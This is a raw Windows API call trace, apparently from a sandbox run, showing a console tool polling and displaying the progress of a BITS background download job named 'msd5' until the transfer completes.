[0063.328] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df0c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df0c*=0x8) returned 1
[0063.328] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.328] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df18 | out: _Buffer="0") returned 1
[0063.328] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df24 | out: _Buffer="1") returned 1
[0063.328] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20def4 | out: lpConsoleScreenBufferInfo=0x20def4) returned 1
[0063.328] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20df0c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df0c*=0x5) returned 1
[0063.329] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20defc | out: lpConsoleScreenBufferInfo=0x20defc) returned 1
[0063.329] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df14*=0x8) returned 1
[0063.329] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.329] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20df20 | out: _Buffer="0") returned 1
[0063.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20df14 | out: lpSystemTimeAsFileTime=0x20df14*(dwLowDateTime=0xd66af850, dwHighDateTime=0x1d469c7))
[0063.329] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20df0c | out: lpSystemTimeAsFileTime=0x20df0c*(dwLowDateTime=0xd66af850, dwHighDateTime=0x1d469c7))
[0063.329] _finite (_X=0x0) returned 0
[0063.330] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20decc | out: lpConsoleScreenBufferInfo=0x20decc) returned 1
[0063.330] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20dee4, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20dee4*=0xd) returned 1
[0063.330] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.330] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ded8 | out: lpConsoleScreenBufferInfo=0x20ded8) returned 1
[0063.330] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20def0, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20def0*=0xf) returned 1
[0063.330] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.331] _vsnwprintf (in: _Buffer=0x20dd04, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20dcc8 | out: _Buffer="0.00 B/S") returned 8
[0063.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20df1c | out: lpConsoleScreenBufferInfo=0x20df1c) returned 1
[0063.331] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20df34, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20df34*=0x8) returned 1
[0063.331] CoTaskMemFree (pv=0x378358)
[0063.331] IBackgroundCopyJob:GetType (in: This=0x36a614, pVal=0x20ef60 | out: pVal=0x20ef60) returned 0x0
[0063.332] IBackgroundCopyJob:GetProgress (in: This=0x36a614, pVal=0x380c80 | out: pVal=0x380c80) returned 0x0
[0063.333] IBackgroundCopyJob:GetPriority (in: This=0x36a614, pVal=0x20ef5c | out: pVal=0x20ef5c) returned 0x0
[0063.333] CoTaskMemFree (pv=0x0)
[0063.333] IBackgroundCopyJob:GetDisplayName (in: This=0x36a614, pVal=0x20ef74 | out: pVal=0x20ef74*="msd5") returned 0x0
[0063.334] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0063.334] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20ef34 | out: lpNumberOfCharsWritten=0x20ef34) returned 1
[0063.334] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20ef34 | out: lpNumberOfAttrsWritten=0x20ef34) returned 1
[0063.334] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0063.335] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.335] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef08 | out: lpConsoleScreenBufferInfo=0x20ef08) returned 1
[0063.335] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef20, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef20*=0xa) returned 1
[0063.335] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.335] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0063.336] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef1c*=0x5) returned 1
[0063.336] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0063.336] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef24*=0x7) returned 1
[0063.336] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef00 | out: lpConsoleScreenBufferInfo=0x20ef00) returned 1
[0063.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef18, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef18*=0x8) returned 1
[0063.337] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.337] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef08 | out: lpConsoleScreenBufferInfo=0x20ef08) returned 1
[0063.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef20, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef20*=0x8) returned 1
[0063.337] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.337] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.338] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0xc) returned 1
[0063.338] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0063.338] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef24*=0xa) returned 1
[0063.338] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.339] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eef4 | out: lpConsoleScreenBufferInfo=0x20eef4) returned 1
[0063.339] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef0c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef0c*=0xa) returned 1
[0063.339] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.339] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.339] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0x8) returned 1
[0063.339] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.340] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef20 | out: _Buffer="0") returned 1
[0063.340] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef2c | out: _Buffer="1") returned 1
[0063.340] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.340] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0x5) returned 1
[0063.340] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.340] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0063.340] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef1c*=0x8) returned 1
[0063.340] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.341] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef28 | out: _Buffer="0") returned 1
[0063.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ef14 | out: lpSystemTimeAsFileTime=0x20ef14*(dwLowDateTime=0xd66af850, dwHighDateTime=0x1d469c7))
[0063.341] _finite (_X=0x0) returned 0
[0063.341] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eed4 | out: lpConsoleScreenBufferInfo=0x20eed4) returned 1
[0063.341] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20eeec, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20eeec*=0xd) returned 1
[0063.341] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.341] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eee0 | out: lpConsoleScreenBufferInfo=0x20eee0) returned 1
[0063.342] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20eef8, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20eef8*=0xf) returned 1
[0063.342] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.342] _vsnwprintf (in: _Buffer=0x20ed0c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20ecd0 | out: _Buffer="0.00 B/S") returned 8
[0063.342] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef24 | out: lpConsoleScreenBufferInfo=0x20ef24) returned 1
[0063.342] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef3c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef3c*=0x8) returned 1
[0063.342] CoTaskMemFree (pv=0x378358)
[0063.343] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 0
[0063.343] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8c0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0063.501] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 1
[0063.501] TranslateMessage (lpMsg=0x20f898) returned 0
[0063.501] DispatchMessageW (lpMsg=0x20f898) returned 0x1
[0063.501] IBackgroundCopyCallback:JobModification (This=0x380c70, pJob=0x36a6a4, dwReserved=0x0) returned 0x0
[0063.501] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0063.505] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc8
[0063.505] IBackgroundCopyJob:GetType (in: This=0x36a614, pVal=0x20ef60 | out: pVal=0x20ef60) returned 0x0
[0063.505] IBackgroundCopyCallback:JobModification (This=0x380c70, pJob=0x36a6a4, dwReserved=0x0) returned 0x0
[0063.506] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0063.506] IBackgroundCopyJob:GetProgress (in: This=0x36a614, pVal=0x380c80 | out: pVal=0x380c80) returned 0x0
[0063.507] IBackgroundCopyJob:GetPriority (in: This=0x36a614, pVal=0x20ef5c | out: pVal=0x20ef5c) returned 0x0
[0063.508] CoTaskMemFree (pv=0x0)
[0063.508] IBackgroundCopyJob:GetDisplayName (in: This=0x36a614, pVal=0x20ef74 | out: pVal=0x20ef74*="msd5") returned 0x0
[0063.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0063.509] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20ef34 | out: lpNumberOfCharsWritten=0x20ef34) returned 1
[0063.509] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20ef34 | out: lpNumberOfAttrsWritten=0x20ef34) returned 1
[0063.509] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0063.509] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef08 | out: lpConsoleScreenBufferInfo=0x20ef08) returned 1
[0063.510] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef20, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef20*=0xa) returned 1
[0063.510] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0063.510] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef1c*=0x5) returned 1
[0063.510] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0063.511] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef24*=0x7) returned 1
[0063.511] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.511] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef00 | out: lpConsoleScreenBufferInfo=0x20ef00) returned 1
[0063.511] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef18, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef18*=0x8) returned 1
[0063.511] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef08 | out: lpConsoleScreenBufferInfo=0x20ef08) returned 1
[0063.512] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef20, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef20*=0x8) returned 1
[0063.512] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.512] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0xc) returned 1
[0063.513] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0063.513] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef24*=0xa) returned 1
[0063.513] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eef4 | out: lpConsoleScreenBufferInfo=0x20eef4) returned 1
[0063.513] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef0c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef0c*=0xa) returned 1
[0063.514] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.514] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.514] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0x8) returned 1
[0063.514] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.515] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef20 | out: _Buffer="0") returned 1
[0063.515] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef2c | out: _Buffer="1") returned 1
[0063.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eefc | out: lpConsoleScreenBufferInfo=0x20eefc) returned 1
[0063.515] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef14, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef14*=0x5) returned 1
[0063.515] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0063.515] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef1c*=0x8) returned 1
[0063.515] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.516] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef28 | out: _Buffer="0") returned 1
[0063.516] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef2c | out: _Buffer="189952") returned 6
[0063.516] _vsnwprintf (in: _Buffer=0xf203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef28 | out: _Buffer="0") returned 1
[0063.516] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ef14 | out: lpSystemTimeAsFileTime=0x20ef14*(dwLowDateTime=0xd6852770, dwHighDateTime=0x1d469c7))
[0063.516] _finite (_X=0x0) returned 1
[0063.516] _finite (_X=0x0) returned 1
[0063.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eed4 | out: lpConsoleScreenBufferInfo=0x20eed4) returned 1
[0063.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x20eeec, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20eeec*=0x11) returned 1
[0063.530] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eee0 | out: lpConsoleScreenBufferInfo=0x20eee0) returned 1
[0063.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20eef8, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20eef8*=0xf) returned 1
[0063.530] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.530] _vsnwprintf (in: _Buffer=0x20ed0c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20ecd0 | out: _Buffer="0.00 B/S") returned 8
[0063.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef24 | out: lpConsoleScreenBufferInfo=0x20ef24) returned 1
[0063.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef3c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20ef3c*=0x8) returned 1
[0063.531] CoTaskMemFree (pv=0x378380)
[0063.531] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 0
[0063.532] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8c0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0064.025] PeekMessageW (in: lpMsg=0x20f898, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f898) returned 1
[0064.025] TranslateMessage (lpMsg=0x20f898) returned 0
[0064.025] DispatchMessageW (lpMsg=0x20f898) returned 0x1
[0064.025] IBackgroundCopyCallback:JobModification (This=0x380c70, pJob=0x36a6a4, dwReserved=0x0) returned 0x0
[0064.025] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0064.026] IBackgroundCopyCallback:JobTransferred (This=0x380c70, pJob=0x36a6a4) returned 0x0
[0064.026] KillTimer (hWnd=0x0, uIDEvent=0x7fc8) returned 1
[0064.026] IBackgroundCopyJob:GetState (in: This=0x36a614, pVal=0x380c7c | out: pVal=0x380c7c) returned 0x0
[0064.027] IBackgroundCopyJob:GetType (in: This=0x36a614, pVal=0x20decc | out: pVal=0x20decc) returned 0x0
[0064.028] IBackgroundCopyJob:GetProgress (in: This=0x36a614, pVal=0x380c80 | out: pVal=0x380c80) returned 0x0
[0064.029] IBackgroundCopyJob:GetPriority (in: This=0x36a614, pVal=0x20dec8 | out: pVal=0x20dec8) returned 0x0
[0064.029] CoTaskMemFree (pv=0x0)
[0064.029] IBackgroundCopyJob:GetDisplayName (in: This=0x36a614, pVal=0x20dee0 | out: pVal=0x20dee0*="msd5") returned 0x0
[0064.030] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de88 | out: lpConsoleScreenBufferInfo=0x20de88) returned 1
[0064.030] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20dea0 | out: lpNumberOfCharsWritten=0x20dea0) returned 1
[0064.030] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20dea0 | out: lpNumberOfAttrsWritten=0x20dea0) returned 1
[0064.030] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0064.031] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0064.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xf143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xf143c4*, lpNumberOfCharsWritten=0x20de8c*=0xa) returned 1
[0064.031] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de70 | out: lpConsoleScreenBufferInfo=0x20de70) returned 1
